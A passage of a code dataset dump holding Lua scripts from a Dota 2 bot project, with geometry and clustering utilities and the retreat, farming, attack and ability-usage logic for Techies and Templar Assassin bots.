= GetUnitToUnitDistance(you, target)\n\tlocal p = dist/d*100\n\n\tlocal locX = youX + (math.abs(youX) - math.abs(targetX))*p\n\tlocal locY = youY + (math.abs(youY) - math.abs(targetY))*p\n\t\n\treturn Vector(locX, locY, 0)\nend\n\n-- Returns a list of the point locations of each tree ID\nfunction getTreeLocations(trees)\n\tlocal treeLocs = {} \n\tfor tree in ipairs(trees) do\n\t\tlocal loc = GetTreeLocation(tree)\n\t\ttable.insert(treeLocs, loc)\n\tend\n\t\n\treturn treeLocs\nend\n\n-- Clusters points (trees) with a defined minimum distance\n-- Returns a list of lists (tree clusters) of tree locations\nfunction cluster(points)\n local clusters = {}\n \n while #points > 0 do\n local s = {}\n local loc = table.remove(points, 1)\n local queue = {loc}\n \n while #queue > 0 do\n local tempQueue = {}\n for i = 1, #queue do\n \tlocal p1 = queue[i]\n \tfor j = 1, #points do\n \t\tlocal p2 = points[j]\n if not samePoint(p1, p2) then\n local dist = getDistance(p1, p2)\n \n if dist < 200 then\n table.insert(tempQueue, p2)\n end\n end\n end\n end\n \n for i = 1, #queue do\n \tlocal p1 = queue[1]\n if not inGroup(s, p1) then\n table.insert(s, p1)\n end\n end\n \n queue = tempQueue;\n \n for i = 1, #tempQueue do\n \tlocal p1 = tempQueue[i]\n \tfor j = 1, #points do\n \t\tlocal p2 = points[j]\n if samePoint(p1, p2) then\n table.remove(points, i)\n break\n end\n end\n end\n end\n if table.getn(s) > 1 then\n \ttable.insert(clusters, s)\n end\n end\n \n return clusters\nend\n\nfunction clusterAndGetCentroids(points)\n\tif table.getn(points) == 0 then return nil end\n\t\n\tlocal clusters = cluster(points)\n\tlocal centroids = {}\n\t\n\tfor group in ipairs(clusters) do\n\t\tlocal centroid = nil\n\t\tlocal xavg = 0\n\t\tlocal yavg = 0\n\t\tfor i,point in ipairs(group) do\n\t\t\txavg = xavg + group[1]\n\t\t\tyavg = yavg + group[2]\n\t\tend\n\t\tlocal size = table.getn(group)\n\t\tcentroid = Vector(xavg/size, yavg/size, 0)\n\t\ttable.insert(centroids, centroid)\n\tend\n\t\n\treturn centroids\nend\n\nfunction getCentroid(points)\n\tlocal centroid = nil\n\tlocal numPoints = table.getn(points)\n\tlocal x = 0\n\tlocal y = 0\n\t\n\tfor p = 1, numPoints do\n\t\tlocal point = points[p]\n\t\t\n\t\tx = x + point[1]\n\t\ty = y + point[2]\n\tend\n\t\n\treturn Vector(x/numPoints, y/numPoints, 0)\nend\n\n-- Returns the distance between two points\nfunction getDistance(p1, p2)\n\treturn math.sqrt((p1[1] - p2[1])*(p1[1] - p2[1]) + (p1[2] - p2[2])*(p1[2] - p2[2]))\nend\n\n-- Gets the coordinates of a point C X degrees from A about the point of origin B\nfunction getAnglePoint(origin, point, degrees)\n\tlocal diffX = origin[1]\n\tlocal diffY = origin[2]\n\n\tlocal creepX = point[1] - diffX\n\tlocal creepY = point[2] - diffY\n\t\n\tlocal newX = creepX * math.cos(math.rad(degrees)) - creepY * math.sin(math.rad(45))\n\tlocal newY = creepY * math.cos(math.rad(degrees)) - creepX * math.sin(math.rad(45))\n\t\n\treturn Vector(newX + diffX, newY + diffY, 0)\nend\n\n-- Checks if the two points are the same point by location\nfunction samePoint(p1, p2)\n\treturn math.floor(p1[1]) == math.floor(p2[1]) and math.floor(p1[2]) == math.floor(p2[2]) \nend\n\n-- Checks if a point is already contained in a group of points\nfunction inGroup(group, point)\n\tfor i = 1, #group do\n\t\tlocal p = group[i]\n\t\tif samePoint(p, point) then\n\t\t\treturn true\n\t\tend\n\tend\n\t\n\treturn false\nend\n\nfunction getDesireString(mode)\n\tif mode == BOT_MODE_NONE then\n\t\treturn \"None\"\n\telseif mode == BOT_MODE_LANING then\n\t\treturn \"Laning\"\n\telseif mode == BOT_MODE_ATTACK then\n\t\treturn \"Attack\"\n\telseif mode == BOT_MODE_RETREAT then\n\t\treturn \"Retreat\"\n\telseif mode == BOT_MODE_SECRET_SHOP then\n\t\treturn \"Secret Shop\"\n\telseif mode == BOT_MODE_SIDE_SHOP then\n\t\treturn \"Side Shop\"\n\telseif mode == BOT_MODE_PUSH_TOWER_TOP then\n\t\treturn \"Push Top Tower\"\n\telseif mode == BOT_MODE_PUSH_TOWER_MID then\n\t\treturn \"Push Mid Tower\"\n\telseif mode == BOT_MODE_PUSH_TOWER_BOT then\n\t\treturn \"Push Bot Tower\"\n\telseif mode == BOT_MODE_DEFEND_TOWER_TOP then\n\t\treturn \"Defend Top Tower\"\n\telseif mode == BOT_MODE_DEFEND_TOWER_MID then\n\t\treturn \"Defend Mid Tower\"\n\telseif mode == BOT_MODE_DEFEND_TOWER_BOT then\n\t\treturn \"Defend Bot Tower\"\n\telseif mode == BOT_MODE_ASSEMBLE then\n\t\treturn \"Assemble\"\n\telseif mode == BOT_MODE_TEAM_ROAM then\n\t\treturn \"Team Roam\"\n\telseif mode == BOT_MODE_FARM then\n\t\treturn \"Farm\"\n\telseif mode == BOT_MODE_DEFEND_ALLY then\n\t\treturn \"Defend Ally\"\n\telseif mode == BOT_MODE_EVASIVE_MANEUVERS then\n\t\treturn \"Evasive Maneuvers\"\n\telseif mode == BOT_MODE_ROSHAN then\n\t\treturn \"Roshan\"\n\telseif mode == BOT_MODE_ITEM then\n\t\treturn \"Item\"\n\telseif mode == BOT_MODE_WARD then\n\t\treturn \"Ward\"\n\tend\nend\n\n-- Get the best target to use Hand of Midas on\nfunction getMidasTarget(npcBot)\n\tlocal creeps = npcBot:GetNearbyLaneCreeps(1600, true)\n\tlocal neutrals = npcBot:GetNearbyNeutralCreeps(1600, true)\n\tlocal creepsToUse = nil\n\tlocal target = nil\n\t\n\tif table.getn(creeps) > 0 then\n\t\tcreepsToUse = creeps\n\telse\n\t\tcreepsToUse = neutrals\n\tend\n\t\n\tif table.getn(creepsToUse) > 0 then\n\t\ttarget = creepsToUse[1]\n\t\t\n\t\tfor i = 2, table.getn(creepsToUse) do\n\t\t\tif target:GetMaxHealth() < creepsToUse[i]:GetMaxHealth() then\n\t\t\t\ttarget = creepsToUse[i]\n\t\t\tend\n\t\tend\n\tend\n\t\n\treturn target\nend\n\n-- Returns whether it's safe to attack a tower\nfunction isTowerSafe(npcBot, tower)\n\tlocal towerTarget = tower:GetAttackTarget()\n\tif towerTarget == nil then\n\t\treturn false\n\tend\n\tlocal targetHP = towerTarget:GetHealth()\n\tlocal targetMaxHP = towerTarget:GetMaxHealth()\n\tlocal distToTower = GetUnitToUnitDistance(npcBot, tower)\n\tlocal nearbyCreeps = tower:GetNearbyLaneCreeps(800, false)\n\t\n\tif targetHP / targetMaxHP <= 0.5 then\n\t\tif table.getn(nearbyCreeps) > 0 then\n\t\t\tlocal creepDistToTower = GetUnitToUnitDistance(nearbyCreeps[1], tower)\n\t\t\tlocal botDistToTower = GetUnitToUnitDistance(npcBot, tower)\n\t\t\t\n\t\t\tif creepDistToTower < botDistToTower then\n\t\t\t\treturn true\n\t\t\tend\n\t\telse\n\t\t\treturn false\n\t\tend\n\telse\n\t\treturn true\n\tend\nend\n\n-- Returns if the item is in a main slot or not and the item itself\nfunction getItemAvailable(itemName, bot)\n\tlocal itemSlot = bot:FindItemSlot(itemName)\n\treturn (bot:GetItemSlotType(itemSlot) == ITEM_SLOT_TYPE_MAIN), bot:GetItemInSlot(itemSlot)\nend"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.760869562625885,
"avg_line_length": 22.25,
"blob_id": "9fcc3040bad0597b34d67255b0ac0d6dc2d7dcc5",
"content_id": "e998b167c77fd200cd1015fac3abfbc804ac7871",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 92,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 4,
"path": "/mode_defend_tower_bottom.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\");\nfunction GetDesire()\n\treturn desires[0];\nend"
},
{
"alpha_fraction": 0.6850783228874207,
"alphanum_fraction": 0.7040395736694336,
"avg_line_length": 31.34666633605957,
"blob_id": "c390a568037052b0f1fd40f8bd599ed6d5fdd637",
"content_id": "35307939f681b6f9173ede22e4e5fbec85d0d745",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2426,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 75,
"path": "/mode_retreat_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\")\nrequire( GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\n\nfunction OnStart()\n\tnpcBot:Action_ClearActions(true)\nend\n\nfunction Think()\n\tlocal fountain = GetShopLocation(GetTeam(), SHOP_HOME)\n\tlocal missile = npcBot:GetAbilityByName(\"tinker_heat_seeking_missile\")\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\tlocal action = npcBot:GetCurrentActionType()\n\t\n\tif GetUnitToLocationDistance(npcBot, fountain) > 100 and action ~= BOT_ACTION_TYPE_USE_ABILITY then\n\t\tnpcBot:Action_MoveToLocation(fountain)\n\tend\nend\n\nfunction GetDesire()\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\tlocal closerEnemies = npcBot:GetNearbyHeroes(900, true, BOT_MODE_NONE)\n\tlocal nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal nearbyTowers = npcBot:GetNearbyTowers(1000, true)\n\tlocal nearbyCreeps = npcBot:GetNearbyCreeps(150, true)\n\tlocal allyCreeps = npcBot:GetNearbyCreeps(1600, false)\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal damagedByCreep = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal damagedByHero = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal botCurrentHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botLoc = npcBot:GetLocation()\n\t\n\tif npcBot:IsChanneling() then\n\t\treturn _G.desires[0]\n\tend\n\t\n\tif npcBot.other_mode == BOT_MODE_ROAM then\n\t\tif table.getn(nearbyEnemies) > 0 then\n\t\t\treturn _G.desires[7]\n\t\telse\n\t\t\treturn _G.desires[0]\n\t\tend\n\telseif table.getn(closerEnemies) > 2 then\n\t\treturn _G.desires[7]\n\telse\n \tfor e = 1, table.getn(nearbyEnemies) do\n \t\tlocal enemy = nearbyEnemies[e]\n \t\tlocal dist = GetUnitToUnitDistance(npcBot, enemy)\n \t\tlocal enemyTarget = enemy:GetAttackTarget()\n \t\tlocal isTargetted = false\n \t\tlocal enemyRange = enemy:GetAttackRange()\n \t\t\n \t\tif enemyTarget ~= nil then\n \t\t\tisTargetted = enemyTarget:GetUnitName() == npcBot:GetUnitName()\n \t\tend\n \t\t\n \t\tif dist < enemyRange or (dist > enemyRange and isTargetted) then\n \t\t\treturn _G.desires[7]\n \t\tend\n \tend\n \t\n \tif (botCurrentHP/botMaxHP < 0.2 and not npcBot:IsChanneling())\n \tor (damagedByCreep and #nearbyCreeps > 3) then\n \t\n \t\treturn _G.desires[7]\n \tend\n \t\n \tif table.getn(nearbyTowers) > 0 then\n \t\treturn _G.desires[7]\n \tend\n\tend\n\treturn _G.desires[0]\nend\n"
},
{
"alpha_fraction": 0.6517121195793152,
"alphanum_fraction": 0.6707562804222107,
"avg_line_length": 27.149484634399414,
"blob_id": "a15d35c34b607e37e04d06962aee1542269ea506",
"content_id": "2e3465f35ad42ec23d5c935837db602aea470315",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 5461,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 194,
"path": "/mode_farm_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\")\nrequire( GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal mode_names = {\n\t[0] = \"Early Mining\",\n\t[1] = \"Early Stacking\",\n\t[2] = \"Consider Camp\",\n\t[3] = \"Attack Camp\"\n}\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\nlocal mode = CONSIDER_CAMP\n\nlocal doneProx = false\nlocal currentAction = 0\nlocal currentStackAction = 0\nlocal radCamps = _G.radiant_camp_locs\nlocal dirCamps = _G.dire_camp_locs\n\nlocal closestCamp = nil\nlocal spawnerLocs = {}\n\nfunction OnStart()\n\tnpcBot.other_mode = BOT_MODE_FARM\n\tnpcBot:Action_ClearActions(true)\nend\n\nfunction GetDesire()\n\tlocal gameTime = DotaTime()\n\tlocal botLevel = npcBot:GetLevel()\n\n\tif botLevel >= 10 then\n\t\treturn _G.desires[5]\n\telse\n\t\treturn _G.desires[2]\n\tend\nend\n\n-- This is the sequence of Techies attacking a neutral camp:\n-- 1: if at camp location, plant a mine in front of camp\n-- 2: attack a neutral once\n-- 3: run away from camp a bit\n-- 4: return to camp location\nfunction attackNeutralSequence(ability, closestCamp)\n\tlocal botDistanceFromCamp = getDistanceBetweenTwoPoints(npcBot:GetLocation(), closestCamp[2])\n\tlocal nearbyNeutrals = npcBot:GetNearbyNeutralCreeps(1000)\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal queue = npcBot:NumQueuedActions()\n\tlocal manaCost = ability:GetManaCost()\n\tlocal botMana = npcBot:GetMana()\n\t\n\tif #nearbyNeutrals > 0 then \n\t\tif currentAction == 0 and ability:IsFullyCastable() and queue == 0 then \n\t\t\tif ability:IsFullyCastable() then \n\t\t\t\tif botDistanceFromCamp < 200 then \n\t\t\t\t\tprint(\" PROXIMITY mine at neutral camp\")\n\t\t\t\t\tnpcBot:Action_UseAbilityOnLocation(ability, closestCamp[2] + RandomVector(20))\n\t\t\t\telseif action ~= _G.actions[\"move\"] and action ~= _G.actions[\"attack_move\"] then\n\t\t\t\t\tnpcBot:ActionPush_MoveToLocation(closestCamp[2])\n\t\t\t\tend\n\t\t\tend\n\t\t\tcurrentAction = 1\n\t\telseif currentAction == 1 and queue == 0 then\n\t\t\tprint(\" ATTACKING neutrals at camp\")\n\t\t\tnpcBot:ActionQueue_AttackUnit(nearbyNeutrals[1], true)\n\t\t\tcurrentAction = 2\n\t\telseif currentAction == 2 and queue == 0 then\n\t\t\tprint(\" MOVING away to kite neutrals\")\n\t\t\tnpcBot:ActionQueue_MoveToLocation(closestCamp[4])\n\t\t\tcurrentAction = 3\n\t\telseif currentAction == 3 and queue == 0 then\n\t\t\tprint(\" MOVING back to neutral camp\")\n\t\t\tnpcBot:ActionQueue_MoveToLocation(closestCamp[2])\n\t\t\tcurrentAction = 0\n\t\tend\n\telseif botDistanceFromCamp > 200 and currentAction ~= 2 and currentAction ~= 3 and action ~= _G.actions[\"move\"] and action ~= _G.actions[\"attack_move\"] then\n\t\tnpcBot:ActionPush_MoveToLocation(closestCamp[2])\n\tend\nend\n\n-- Set the given camp to killed\nfunction setKilledCamp(resetCamp, team)\n\tif team == TEAM_RADIANT then\n\t\tfor i, camp in pairs(radCamps) do\n\t\t\tif resetCamp[1] == camp[1] then\n\t\t\t\tcamp[5] = true\n\t\t\tend\n\t\tend\n\telse\n\t\tfor i, camp in pairs(dirCamps) do\n\t\t\tif resetCamp[1] == camp[1] then\n\t\t\t\tcamp[5] = true\n\t\t\tend\n\t\tend\n\tend\nend\n\n-- Get the next nearest camp that hasn't been killed, appropriate to level\nfunction getClosestCamp(level)\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal closestDist = 100000\n\tlocal closestCamp = nil\n\n\tif level <= 6 then\n\t\t-- attack easy and medium camps\n\t\tif botTeam == _G.teams[1] then\n\t\t\tif radCamps[1][5] then\n\t\t\t\tfor _, camp in pairs(radCamps) do\n\t\t\t\t\tif not camp[5] then\n\t\t\t\t\t\tif camp[3] == 1 or camp[3] == 2 then\n\t\t\t\t\t\t\tlocal dist = getDistanceBetweenTwoPoints(botLoc, camp[1])\n\t\t\t\t\t\t\tif dist < closestDist then\n\t\t\t\t\t\t\t\tclosestDist = dist\n\t\t\t\t\t\t\t\tclosestCamp = camp\n\t\t\t\t\t\t\t\tprint(\"DISTANCE FROM CAMP = \"..dist)\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\tif closestCamp ~= nil then\n\t\t\t\t\tprint(\"CLOSEST CAMP CHOSEN = \"..closestCamp[1][1]..\",\"..closestCamp[1][2])\n\t\t\t\telse\n\t\t\t\t\tprint(\"ALL CAMPS ARE DESTROYED!!!!!!!!\")\n\t\t\t\tend\n\t\t\telse\n\t\t\t\tclosestCamp = radCamps[1]\n\t\t\tend\n\t\t\treturn closestCamp\n\t\telse\n\t\t\tfor _, camp in pairs(dirCamps) do\n\t\t\t\tif not camp[5] then\n\t\t\t\t\tif camp[3] == 1 or camp[3] == 2 then\n\t\t\t\t\t\tlocal dist = getDistanceBetweenTwoPoints(botLoc, camp[1])\n\t\t\t\t\t\tif dist < closestDist then\n\t\t\t\t\t\t\tclosestDist = dist\n\t\t\t\t\t\t\tclosestCamp = camp\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn closestCamp\n\t\tend\n\telseif level > 6 then\n\t\t-- attack medium, hard and ancient\n\t\tif botTeam == _G.teams[1] then\n\t\t\tfor _, camp in pairs(radCamps) do\n\t\t\t\tif not camp[5] then\n\t\t\t\t\tif camp[3] == 2 or camp[3] == 3 then\n\t\t\t\t\t\tlocal dist = getDistanceBetweenTwoPoints(botLoc, camp[1])\n\t\t\t\t\t\tif dist < closestDist then\n\t\t\t\t\t\t\tclosestDist = dist\n\t\t\t\t\t\t\tclosestCamp = camp\n\t\t\t\t\t\t\tprint(\"DISTANCE FROM CAMP = \"..dist)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\tif closestCamp ~= nil then\n\t\t\t\t\tprint(\"CLOSEST CAMP CHOSEN = \"..closestCamp[1][1]..\",\"..closestCamp[1][2])\n\t\t\t\telse\n\t\t\t\t\tprint(\"ALL CAMPS ARE DESTROYED!!!!!!!!\")\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn closestCamp\n\t\telse\n\t\t\tfor _, camp in pairs(dirCamps) do\n\t\t\t\tif not camp[5] then\n\t\t\t\t\tif camp[3] == 2 or camp[3] == 3 then\n\t\t\t\t\t\tlocal dist = getDistanceBetweenTwoPoints(botLoc, camp[1])\n\t\t\t\t\t\tif dist < closestDist then\n\t\t\t\t\t\t\tclosestDist = dist\n\t\t\t\t\t\t\tclosestCamp = camp\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn closestCamp\n\t\tend\n\tend\nend\n\nfunction minePlaced(vecLoc)\n\tlocal unitList = GetUnitList(UNIT_LIST_ALLIES)\n\tfor unit = 1, table.getn(unitList) do\n\t\tlocal mine = unitList[unit] \n\t\tif mine:GetUnitName() == \"npc_dota_techies_land_mine\" then\n\t\t\tif mine:GetLocation()[1] == vecLoc[1] and mine:GetLocation()[2] == vecLoc[2] then\n\t\t\t\treturn true\n\t\t\tend\n\t\tend\n\tend\n\treturn false\nend\n"
},
{
"alpha_fraction": 0.626336395740509,
"alphanum_fraction": 0.6425032615661621,
"avg_line_length": 43.08045959472656,
"blob_id": "9eacf8a2c1c9baa22c0a76e4239ae8e95bef8eb3",
"content_id": "a90acc042c7f60c21ca25811c1c982be567006dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 3835,
"license_type": "no_license",
"max_line_length": 138,
"num_lines": 87,
"path": "/mode_attack_techies.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\");\nrequire( GetScriptDirectory()..\"/UtilityFunctions\");\n----------------------------------------------------------------------------------------------------\n\nlocal npcBot = GetBot();\n\nfunction OnStart()\n\tnpcBot.other_mode = BOT_MODE_ATTACK\n npcBot:Action_ClearActions(true);\nend\n\n-- Logic for all Attack Mode behavior\n--function Think()\n-- -- Abilities\n-- local ProximityMine = npcBot:GetAbilityByName(\"techies_land_mines\");\n-- local StasisTrap = npcBot:GetAbilityByName(\"techies_stasis_trap\");\n-- local BlastOff = npcBot:GetAbilityByName(\"techies_suicide\");\n-- local RemoteMine = npcBot:GetAbilityByName(\"techies_remote_mines\");\n--\n-- local nearbyEnemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE);\n-- local nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE);\n-- local botLoc = npcBot:GetLocation();\n--\n-- local botHP = npcBot:GetHealth();\n-- local botMaxHP = npcBot:GetMaxHealth();\n-- local botMana = npcBot:GetMana();\n--\n-- -- Make sure allies are around to assist the fight\n-- if #nearbyEnemies > 0 and #nearbyAllies > 0 then\n-- local enemyLoc = nearbyEnemies[1]:GetLocation();\n-- local distToEnemy = _G.getDistanceBetweenTwoPoints(enemyLoc, botLoc);\n-- local aoeLoc = npcBot:FindAoELocation(true, true, enemyLoc, 400, 1000, 0, 600);\n--\n-- if BlastOff:IsFullyCastable() and aoeLoc.count > 0 and (botHP / botMaxHP) > 0.5 then\n-- local nearbyTowers = npcBot:GetNearbyTowers(1000, true);\n-- if #nearbyTowers > 0 then\n-- local aoeDistToTower = _G.getDistanceBetweenTwoPoints(botLoc, nearbyTowers[1]);\n-- if aoeDistToTower > 700 then\n-- npcBot:ActionPush_UseAbilityOnLocation(BlastOff, aoeLoc.targetloc);\n-- end\n-- else\n-- npcBot:ActionPush_UseAbilityOnLocation(BlastOff, aoeLoc.targetloc);\n-- end\n-- elseif StasisTrap:IsFullyCastable() then\n-- npcBot:ActionPush_UseAbilityOnLocation(StasisTrap, botLoc + RandomVector(50));\n-- elseif RemoteMine:IsFullyCastable() then\n-- npcBot:ActionPush_UseAbilityOnLocation(RemoteMine, enemyLoc + RandomVector(50));\n-- elseif ProximityMine:IsFullyCastable() then\n-- npcBot:ActionPush_UseAbilityOnLocation(ProximityMine, botLoc + RandomVector(100));\n-- elseif npcBot:GetCurrentActionType() ~= _G.actions[\"attack\"] and npcBot:GetCurrentActionType() ~= _G.actions[\"attack_move\"] then\n-- npcBot:Action_AttackUnit(nearbyEnemies[1], false);\n-- end\n-- end\n--end\n\nfunction GetDesire()\n -- Abilities\n local ProximityMine = npcBot:GetAbilityByName(\"techies_land_mines\");\n local StasisTrap = npcBot:GetAbilityByName(\"techies_stasis_trap\");\n local BlastOff = npcBot:GetAbilityByName(\"techies_suicide\");\n local RemoteMine = npcBot:GetAbilityByName(\"techies_remote_mines\");\n\n local nearbyEnemies = npcBot:GetNearbyHeroes(1000, true, BOT_MODE_NONE);\n local nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE);\n local ratio = #nearbyEnemies / (#nearbyAllies + 1);\n local averageEnemyHP = 0;\n local lowestEnemyHP = 100000;\n local highestEnemyHP = 0;\n\n for _, enemy in pairs(nearbyEnemies) do\n local enemyHP = enemy:GetHealth();\n averageEnemyHP = averageEnemyHP + enemyHP;\n if enemyHP < lowestEnemyHP then\n lowestEnemyHP = enemyHP;\n end\n if enemyHP > highestEnemyHP then\n highestEnemyHP = enemyHP;\n end\n end\n\n if BlastOff:IsFullyCastable() and #nearbyEnemies > 0\n and averageEnemyHP <= BlastOff:GetAbilityDamage() then\n return _G.desires[7];\n end\n \n return _G.desires[0];\nend\n"
},
{
"alpha_fraction": 0.7296072244644165,
"alphanum_fraction": 0.745090663433075,
"avg_line_length": 34.30666732788086,
"blob_id": "e6261896611577a00649e56de0d931735e617ad9",
"content_id": "da5fb4d4858666098bd741ac7b4b7502110147fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 2648,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 75,
"path": "/mode_retreat_templar_assassin.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "require( GetScriptDirectory()..\"/UtilityData\")\nrequire( GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal hpThreshold = 0.2\n\nfunction OnStart()\n\tnpcBot:Action_ClearActions(true)\nend\n\n-- When faced with multiple enemies, fall back to a safe location\nfunction Think()\n\tlocal fountain = GetShopLocation(GetTeam(), SHOP_HOME)\n\tlocal enemies = npcBot:GetNearbyHeroes(1600, true, BOT_MODE_NONE)\n\tlocal botHealth = npcBot:GetHealth()\n\tlocal botMaxHealth = npcBot:GetMaxHealth()\n\tlocal botAction = npcBot:GetCurrentActionType()\n\tlocal damagedByCreep = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal damagedByHero = npcBot:WasRecentlyDamagedByCreep(1)\n\t\n\tlocal bottleLoc = npcBot:FindItemSlot(\"item_bottle\")\n\tlocal salveLoc = npcBot:FindItemSlot(\"item_flask\")\n\tlocal tangoLoc = npcBot:FindItemSlot(\"item_tango\")\n\tlocal portalLoc = npcBot:FindItemSlot(\"item_tpscroll\")\n\t\n\tif botHealth/botMaxHealth <= hpThreshold and GetUnitToLocationDistance(npcBot, fountain) > 100 and not npcBot:IsChanneling() then\n\t\tif bottleLoc ~= ITEM_SLOT_TYPE_MAIN \n\t\tand salveLoc ~= ITEM_SLOT_TYPE_MAIN \n\t\tand tangoLoc ~= ITEM_SLOT_TYPE_MAIN \n\t\tand portalLoc == ITEM_SLOT_TYPE_MAIN then\n\t\t\tnpcBot:Action_UseAbilityOnLocation(npcBot:GetItemInSlot(portalLoc), fountain)\n\t\telse\n\t\t\tnpcBot:Action_MoveToLocation(fountain)\n\t\tend\n\telse\n\t\tnpcBot:Action_MoveToLocation(fountain)\n\tend\nend\n\nfunction GetDesire()\n\tlocal nearbyEnemies = npcBot:GetNearbyHeroes(650, true, BOT_MODE_NONE)\n\tlocal nearbyAllies = npcBot:GetNearbyHeroes(1000, false, BOT_MODE_NONE)\n\tlocal nearbyTowers = npcBot:GetNearbyTowers(1000, true)\n\tlocal nearbyCreeps = npcBot:GetNearbyLaneCreeps(150, true)\n\tlocal currentAction = npcBot:GetCurrentActionType()\n\tlocal damagedByCreep = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal damagedByHero = npcBot:WasRecentlyDamagedByCreep(1)\n\tlocal botCurrentHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botLoc = npcBot:GetLocation()\n\tlocal mode = npcBot:GetActiveMode()\n\t\n\tlocal closerEnemies = npcBot:GetNearbyHeroes(400, true, BOT_MODE_NONE)\n\tlocal fartherEnemies = npcBot:GetNearbyHeroes(800, true, BOT_MODE_NONE)\n\n\tif npcBot.duel then\n\t\treturn _G.desires[1]\n\tend\n\t\n\tif (currentAction ~= BOT_ACTION_TYPE_USE_ABILITY and not npcBot:IsChanneling()) \n\t\tand (#fartherEnemies > 1) \n \tor (#closerEnemies > 0) \n \tor (#nearbyTowers > 0)\n \tor (botCurrentHP/botMaxHP < hpThreshold)\n \tor ((damagedByCreep and #nearbyCreeps > 2) or damagedByHero) then\n \t\n \tif mode == BOT_MODE_ATTACK then\n \t\treturn _G.desires[3]\n \tend\n \t\n\t\treturn _G.desires[6] \n\tend\n\t\n\treturn _G.desires[1]\nend\n"
},
{
"alpha_fraction": 0.7015444040298462,
"alphanum_fraction": 0.7129343748092651,
"avg_line_length": 33.76510238647461,
"blob_id": "82d533c6334f8fe24b2154f18594803493f4a3e3",
"content_id": "ef50883187ca7fd0ad1275c048fddc4167a400da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Lua",
"length_bytes": 5180,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 149,
"path": "/ability_item_usage_templar_assassin.lua",
"repo_name": "vpus/vpesports-enhanced-bot",
"src_encoding": "UTF-8",
"text": "local build = require(GetScriptDirectory()..\"/item_build_templar_assassin\")\nrequire(GetScriptDirectory()..\"/UtilityData\")\nrequire(GetScriptDirectory()..\"/UtilityFunctions\")\n\nlocal npcBot = GetBot()\nlocal botTeam = GetTeam()\n\nlocal refraction = npcBot:GetAbilityByName(\"templar_assassin_refraction\")\nlocal meld = npcBot:GetAbilityByName(\"templar_assassin_meld\")\nlocal psi = npcBot:GetAbilityByName(\"templar_assassin_psi_blades\") \nlocal trap = npcBot:GetAbilityByName(\"templar_assassin_trap\")\nlocal psitrap = npcBot:GetAbilityByName(\"templar_assassin_psionic_trap\")\n\nfunction BuybackUsageThink()end\n\nfunction AbilityLevelUpThink()\n\tlocal skillsToLevel = build[\"skills\"]\n\tif npcBot:GetAbilityPoints() > 0 and skillsToLevel[1] ~= nil then\n\t\tnpcBot:ActionImmediate_LevelAbility(skillsToLevel[1])\n\t\ttable.remove(skillsToLevel, 1)\n\tend\nend\n\n-- Logic for all Ability Usage behavior\nfunction AbilityUsageThink()\n\t-- Stats\n\tlocal botMana = npcBot:GetMana()\n\tlocal botMaxMana = npcBot:GetMaxMana()\n\tlocal botHP = npcBot:GetHealth()\n\tlocal botMaxHP = npcBot:GetMaxHealth()\n\tlocal botLevel = npcBot:GetLevel()\n\tlocal mode = npcBot:GetActiveMode()\n\tlocal action = npcBot:GetCurrentActionType()\n\tlocal allyList = GetUnitList(UNIT_LIST_ALLIES)\n\tlocal botMode = npcBot:GetActiveMode()\n\tlocal hpPercent = botHP/botMaxHP\n\n\t-- Nearby Units\n\tlocal allies = 